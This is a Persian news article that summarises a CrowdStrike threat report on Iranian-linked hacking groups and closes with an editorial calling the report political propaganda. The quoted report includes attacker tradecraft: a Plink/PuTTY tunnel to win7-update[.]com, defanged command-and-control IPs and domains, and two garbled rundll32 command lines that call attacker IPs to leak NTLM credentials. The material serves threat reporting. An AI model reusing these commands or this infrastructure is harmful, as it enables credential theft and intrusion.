جدیدترین ادعای شرکت امنیت سایبری کرود استرایک در مورد توان سایبری ایران

به گزارش کارگروه بین الملل سایبربان؛ خبرگزاری نیویورک‌تایمز اخیرا خبری مبنی بر نگرانی کارشناسان امنیت سایبری امریکا و اسرائیل در رابطه با افزایش حملات تلافی‌جویانه از سوی ایران در پی تصمیم ترامپ برای خروج از برجام منتشر کرد.

مقدمه

این خبر که بر اساس گزارشی از موسسه کرود استرایک (Crowd Strike) منتشرشده مدعی است تحلیلگران واحد جنگ‌افزار پنتاگون، با نظارت بر ترافیک اینترنتی ایران دریافته‌اند که فعالیت‌های سایبری این کشور افزایش‌یافته است. به‌علاوه، کارشناسان نام‌برده هشدار داده‌اند که هکرهای ایرانی ایمیل‌های حاوی بدافزار به دیپلمات‌های مشغول در ادارات امور خارجه متحدان ایالات‌متحده و کارمندانشان در شرکت‌های مخابراتی، برای نفوذ به سامانه‌های کامپیوتری ارسال کرده‌اند. کارشناسان امنیتی موسسه امنیتی نام‌برده معتقدند که هکرهای ایرانی برای جمع‌آوری اطلاعات، در حال بررسی آدرس‌های اینترنتی متعلق به تأسیسات نظامی ایالات‌متحده در اروپا طی دو ماه گذشته هستند. به گفته آن‌ها، با امضای برجام حدود سه سال پیش، همسایگان خاورمیانه ایران معمولاً اهداف این هکرها بوده‌اند. در گزارش این شرکت امنیتی، تأکید شده است که زیرساخت‌های انرژی، نفت و گاز و زیرساخت‌های مالی آمریکایی، احتمالاً هدف حملات هکرهای ایرانی هستند.

این گزارش صرفاً در مورد ایران نیست و در آن به کشورهایی نظیر چین، روسیه یا کره شمالی هم اشاره‌شده است، ولی به دلیل گستردگی این گزارش، صرفاً بخش مربوط به ایران، موردبررسی قرارگرفته است.

متن گزارش

در گزارش شرکت امنیتی Crowd Strike آمده است:

در طی نیمه دوم سال 2017 فالکون اینتلیجنس (Falcon Intelligence)، شاهد افزایش حمله بدافزارها باهدف کاربران اینترنتی در مکان‌های فارسی‌زبان بود. گزارش منبع باز، دو مورد از بدافزارهای اخیر را در ماه‌های اکتبر و نوامبر 2017، به نام‌های تایرنت (TYRANT) و وانا اسمایل فهرست کرد. علیرغم اینکه گزارش‌ها حاکی از آن است که عملیات سایبری یادشده هردو طبیعتی مجرمانه داشتند، فالکون اینتلیجنس مدعی است دولت ایران و بازیگران حمایت‌شده دولتی، انگیزه‌ای برابر برای اقدام به این حملات داشتند.

بر اساس ادعای یک مقام دولتی ایران، شبکه نرم‌افزار سایفون، توسط اپراتورهای کمپین تایرنت به شکل جعلی ساخته‌شده بود. نرم‌افزار نام‌برده در ایران برای عبور از فیلترینگ دولتی به کار می‌رود. دولت ایران نیز در مورد هدف قرار دادن نرم‌افزارهای همه‌گیری چون سایفون سابقه طولانی دارد. چنانچه عملیات تایرنت به‌وسیله مسائل امنیتی داخلی انجام‌شده باشد، این موضوع ظرفیت توانایی دولت را برای ایجاد بستری به‌منظور ارتکاب جرم‌های سایبری و موارد استفاده نرم‌افزاری، مانند سایفون را نشان می‌دهد. در سال 2017 فالکون اینتلیجنس، با انجام یک بررسی اجمالی، فعالیت‌های مشکوکی را در چین، روسیه، ایران و کره شمالی شناسایی کرد. احتمال دارد این عملیات، در راستای کمک به نیازهای اطلاعاتی یا نظامی دولتی صورت گرفته باشد.

بیشتر اهداف عملیاتی که توسط ایران انجام‌شده است در مناطق غرب آسیا (خاورمیانه) و خصوصاً عربستان سعودی بوده است. شاخص‌ترین آن‌ها، به ابتدای سال 2017 بازمی‌گردد که‌موجی از حملات مخرب در ماه ژانویه تحت عنوان شمعون، زیرساخت‌های نفتی عربستان را هدف قرار داد.

 بر اساس ادعای گزارش یادشده موج حملات ژانویه 2017، ادامه حملات مخرب پایان سال 2016 بوده است. کرود استرایک از ارتباط میان شمعون ارتقا یافته و یک دشمن جدید به نام ولاتایل کیتن (VOLATILE KITTEN) آگاهی پیداکرده است. اگرچه که نشانه‌هایی از نقش چارمینگ کیتن (CHARMING KITTEN)، برای به دست آوردن دسترسی به شبکه‌ها جهت حملات دنباله‌دار در این عملیات دیده می‌شود.

این حملات در طول سال 2017 از طریق چارمینگ کیتن و هلیکس کیتن (HELIX KITTEN)، با توان عملیاتی بالا خطرات فراوانی را برای مخالفان سیاسی داخلی و خارجی به‌ویژه پیش از انتخابات ریاست جمهوری سال 1396 به همراه داشت. در گزارش یادشده از حملات هلیکس کیتن، برای ایجاد اختلال در طول سال 2017 در مناطق متعددی از آسیای غربی به‌ویژه عربستان سعودی نوشته‌شده است. بدافزار مخربی که در اغلب این حملات استفاده‌شده است، هلمینت نام دارد که طی زمان ارتقا یافت.

در طول سال 2017، فالکون اینتلیجنس، شاهد مستنداتی بود که ایران، عناصری از دکترین جنگ نرم را در عملیات سایبری خود گنجانده است. در این دکترین، به تعاریفی چون تلاش برای ایجاد موانع در برابر فشارهای سیاسی، اجتماعی و فرهنگی اشاره‌شده است. اقدام بالا پس از انتخابات سال 1392 با رشد جدی‌تری، به‌منظور نفوذ به مخاطبان داخلی از طریق انتشار اطلاعات غلط و خاموش کردن صدای مخالفان همراه بود.

دکترین جنگ نرم انگیزه اصلی در حمایت از حملات مخرب علیه گروه‌های فعال سیاسی بوده است. در ماه می 2017، فالکون اینتلیجنس، شاهد این بود که چارمینگ کیتن، گروه‌های مردم‌نهاد (NGO)، مخالفان سیاسی و جوامع فعال سیاسی را مورد هدف قرارداد. زیرساخت عظیمی که در این کمپین وجود داشت، در اواسط ماه آوریل یا اوایل ماه می ایجاد شد. در این گزارش پیش‌بینی‌شده با توجه به نوع ساختار این عملیات و بازه زمانی یادشده، این رفتار به‌منظور ارائه و ایجاد آگاهی وضعیتی، برای رهبری ایران پیش از انتخابات سال 1392 طراحی‌شده است. از دیگر اهداف دکترین جنگ نرم، جلوگیری از افزایش شیوع قدرت و فرهنگ غربی در داخل کشور است. ازجمله فعالیت‌های دیگر چارمینگ کیتن، می‌توان به حمله به کردهای عراق، جلوگیری از استقلال‌طلبی آن‌ها و اندیشکده های غربی، به منشور جلوگیری از فعالیت‌های ضد ایرانی آن‌ها اشاره کرد.

ایران در دکترین جنگ نرم خود همواره از گروه‌های هکری نیابتی برای جلوگیری از شناسایی ارتباط مستقیم دولت با هکرها استفاده کرده است. از فعالیت‌هایی که در این راستا صورت گرفت، می‌توان به حملات سایبری (DDOS) به برخی وب‌سایت‌های دولتی عربستان سعودی در پی حملات تروریستی داعش در تهران اشاره کرد. گفته‌شده به دلیل اظهارات مقامات ایرانی در رابطه ارتباط عربستان و داعش و زمان به وقوع پیوستن این حملات، سازمان‌های دولتی مانند سپاه پاسداران مسئول این اقدام بودند.

در ادامه این گزارش از ادامه اقدامات ایران در بررسی فعالیت‌های مخالفان داخلی، هم‌راستا با کنترل آگاهی وضعیتی از کشورهای همسایه و نفوذ احتمالی بیشتر علیه ایالات‌متحده نوشته‌شده است.

در مقدمه بخش دوم یافته‌های گزارش کرود استرایک آمده است که بخش قابل‌توجهی از تحرکات سایبری نامشروع دولت‌های مختلف، به افزایش چشم‌گیر فعالیت‌های ایران و کره شمالی مربوط می‌شود. در ادامه مشاهدات از تغییری در اولویت‌بندی اهداف روسیه و چین به سمت اندیشکده های غربی یادشده است.

در بخش حملات به زیرساخت‌ها و سازمان‌های رفاهی این گزارش آمده است:

در ماه اوت، یک گروه کیتن (در این گزارش، گروه کیتن برای هکرهای منتسب به ایران استفاده شده است) با استفاده از اعتبارنامه‌های موجود به سرورهای دو هتل زنجیره‌ای دسترسی پیدا کردند. با به‌کارگیری ابزار «SysInternals PsExec» برای اجرای دستور، بازیگران این حمله، سرویسی به نام «Microsoft Proxy Service» را نصب کردند. این سرویس با استفاده از پروتکل سفارشی‌سازی شده «Pink Secure Shell – SSH» از ترمینال پوتی «PuTTY»، یک شل رمزنگاری‌شده با زیر دامنه win7-update[.]com ساخته و پورت‌ها را از 3389 به 8516 در میزبان محلی انتقال داد. مهاجم، از طریق این پایانه به شبکه اینترنت متصل می‌شود. تحلیلگران گروه فالکون اینتلیجنس، در واحد فرماندهی و کنترل زیرساخت‌ها، به اشتراک مشهودی میان بازیگران این حمله و هلیکس کیتن پی بردند. به‌علاوه، نسخه پلینک (Plink) به‌کاررفته، یک نسخه سفارشی‌سازی شده بوده است. این‌گونه از رفتار، نمایانگر رشد توانمندی‌های بازیگرانی است که با عملیات سایبری ارتباط دارند.

در بخش حملات کیتن به سازمان‌های آسیای غربی نوشته‌شده است:
«ترفندهای مشاهده‌شده عبارت‌اند از افزایش امتیازات در بهره‌برداری از آسیب‌پذیری‌ها، دسترسی‌های اعتباری، اجرای (Rundll32) و فرماندهی و کنترل.
همانند افزایش تعداد حملات چولیما (CHOLLIMA) در سال 2017، اور واچ (OverWAtch) مظنون مهم‌تری به نام حملات کیتن را در همان سال شناسایی کرد. یکی از کارمندان یک شرکت پتروشیمی غرب آسیا در ماه جولای، از طریق یک ایمیل محتوی بدافزار، مورد هدف قرار گرفت.
بدافزار یادشده به دلیل حسگرهای موجود در سامانه میزبان (host)، نتوانست به‌طور کامل هدف را آلوده کند. تاکتیک و هدف این اقدام بسیار شبیه به رفتار کیتن بود. لینک آلوده به آدرس آی پی 51.255.24{.}88 شناخته شده است. بر اساس فالکون اینتلیجنس، نشانی مذکور به نام زیرساخت‌های هلیکس کیتن شناسایی و قبل از جاگذاری هلمینت، به‌عنوان فرماندهی و کنترل آن استفاده شد.
اور واچ بعدها در ماه سپتامبر شاهد یک آسیب وب استراتژیکی (SWC) در بستر وسیعی از صنایع بود. وب‌سایت انجمن قلب سعودی «ksacpr.org{.}sa» مورد هدف قرار گرفت و در پی این اتفاق، بازدیدکنندگان آن به دامنه آلوده و مخرب adobe-plugin{.}bid هدایت‌شده، در نشانی 188.165.187{.}235 قرار گرفتند. قربانیان به‌صورت خودکار اجازه تبادل اطلاعات را به سرورهای بیرونی هدایت‌شونده توسط مهاجم دادند.
بر اساس اطلاعات فالکون، زیرساخت‌های مخرب مشاهده‌شده بسیار شبیه به عملیات آسیب وب استراتژیکی به زیرساخت‌های حیاتی و انرژی امریکای شمالی در اوایل سال 2017 بود. دستور حملات به شکل زیر است:
run1132.exe C:\WINDOWS\system32\davclnt.d11,DavSetCookie 184.154.150{.}66
در حمله به انجمن قلب سعودی، دستور حملات مهاجم بسیار شبیه به نمونه بالا است. برای مثال:
run1132.exe C:\WINDOWS\system32\davclnt.d11,DavSetCookie 188.165.187{.}235
این نوع ارتباطات می‌تواند پروتکل امنیت داخلی «NTLM» را در برابر مهاجمان به نمایش درآورده و در آینده به‌صورت آفلاین موردحمله قرار گیرد. فالکون اینتلیجنس، فعالیت‌های آسیب وب استراتژیکی به زیرساخت‌های حیاتی و انرژی را به بازیگران روسی مرتبط ساخت. این در حالی است که حملات مشابه به وب‌سایت انجمن قلب سعودی را به بازیگران کیتن و ایران ارتباط می‌دهد.»

تحلیل

با توجه به رصد و شناسایی حملات متعدد و ارائه آمار و ارقام دقیق در این گزارش، نکته قابل‌توجه این است که همه اطلاعات موجود، مربوط به سال 2017 است. دو، اینکه در گزارش مذکور، هنوز سندی برای اثبات محتمل بودن حملات در این برهه کنونی، از جانب ایران اشاره نشده است و تنها تلاش شده با استفاده از مستندات قدیمی، احتمال بروز یک حمله سایبری به زیرساخت‌های کشورهای غربی داده شود. سوم اینکه به نظر می‌رسد با توجه به زمان انتشار این گزارش، آمریکا تنها به دنبال نوعی دست پیش گرفتن در ماجرای برجام است تا بعدازاین، هرگونه اقدام احتمالی در فضای سایبری را به ایران نسبت دهد.

نکته مهم دیگر، این است که این گزارش، اشاراتی هرچند محدود به دکترین جنگ نرم جمهوری اسلامی ایران کرده است که به نظر می‌رسد به عملیات سایبری ایران در حوزه شناختی مربوط باشد. اشاره به این نوع از حملات در گزارش‌های اخیر منتسب به ایران، در حال افزایش است. بدیهی است که همه نکات بالا می تواند یک وجه مشترک، آن هم برپایی یک پروپاگاندای سیاسی  و ادامه ایران هراسی سایبری برای گذر از این برهه زمانی در سطح بین المللی داشته باشد.